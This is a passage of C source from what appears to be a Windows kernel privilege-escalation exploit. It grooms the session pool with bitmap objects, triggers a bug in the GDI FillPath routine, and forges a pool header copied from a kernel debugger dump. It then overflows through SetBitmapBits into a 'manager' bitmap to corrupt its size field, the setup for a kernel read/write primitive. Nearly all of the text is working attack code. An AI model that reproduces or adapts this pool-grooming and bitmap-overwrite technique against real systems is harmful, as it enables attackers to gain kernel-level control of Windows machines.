		targets_objects[i].dummy_bitmap   = createBitmapOfSize(bitmap_size);
		targets_objects[i].pwnd_bitmap    = createBitmapOfSize(0xfe0); // -> pool will be 0xff0 alloc'ed / 0x10 free
		targets_objects[i].manager_bitmap = createBitmapOfSize(0xfe0); // -> pool will be 0xff0 alloc'ed / 0x10 free
		targets_objects[i].worker_bitmap  = createBitmapOfSize(0xfe0); // -> pool will be 0xff0 alloc'ed / 0x10 free
	}

	// now trigger some more chunksize allocations to fill the holes
	for (int i = 0; i < create_objs_count / 2; i++) {
		AllocateOnSessionPool(chunksize);
	}

	// finally, trigger bug in FillPath!
	FillPath(hMemDC);

	SetPriorityClass(GetCurrentProcess(), NORMAL_PRIORITY_CLASS);
	SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_NORMAL);

	printf("[BUG 4/4] hit trigger in FillPath!\n");

	/*
	fix pool header, this is static for a given size. errm. lol. kernel hacking is so 1999 >_<
	0: kd> db ffffe428`9c5f8000+2000
	ffffe428`9c5fa000  00 00 ff 23 47 68 30 35-00 00 00 00 00 00 00 00  ...#Gh05........
	ffffe428`9c5fa010  50 08 05 0c 00 00 00 00-00 00 00 00 00 00 00 00  P...............
	ffffe428`9c5fa020  80 c0 3b d7 81 a9 ff ff-00 00 00 00 00 00 00 00  ..;.............
	*/
	// sizeof(...) - 1: the string literal's terminating NUL is not part of the 16-byte header
	BYTE pool_header_bitmap[] = "\x00\x00\xff\x23\x47\x68\x30\x35\x00\x00\x00\x00\x00\x00\x00\x00";
	memcpy(&bitmap_bits[bitmap_overwrite_count_until_sizlBitmap - 0x50], &pool_header_bitmap, sizeof(pool_header_bitmap) - 1);
	
	printf("[+] trigger 2nd overflow via SetBitmapBits - main thread will deadlock now\n");
	Sleep(100);

	// set flag for continuation thread and hit SetBitmapBits right afterwards
	go = true;
	
	// trigger overflow into manager bitmap to set sizlBitmap.x field
	// be careful to overwrite with correct BaseObject.hHmgr!
	for (int i = create_objs_count - 1; i >= 0; i--) {

		// set global bitmap vars. 
		pwnd_bitmap = targets_objects[i].pwnd_bitmap;
		manager_bitmap = targets_objects[i].manager_bitmap;
		worker_bitmap = targets_objects[i].worker_bitmap;

		// make sure we overwrite with the correct BASEOBJECT64.hHmgr value!
		memcpy(&bitmap_bits[bitmap_overwrite_count_until_sizlBitmap - 0x40], &targets_objects[i].manager_bitmap, sizeof(UINT64));

		// attempt overflow. if we hit the overwritten object we'll never return from this call
		// (a call that returns the full byte count also ends the loop)
		if (SetBitmapBits(targets_objects[i].pwnd_bitmap, bitmap_overwrite_count_until_sizlBitmap, bitmap_bits) == bitmap_overwrite_count_until_sizlBitmap)
			break;
	}
	
	// do not exit main thread if we return from the loop without hitting the overwrite
	// if something else got overwritten you'd just BSOD your machine ;)
	Sleep(-1);
}
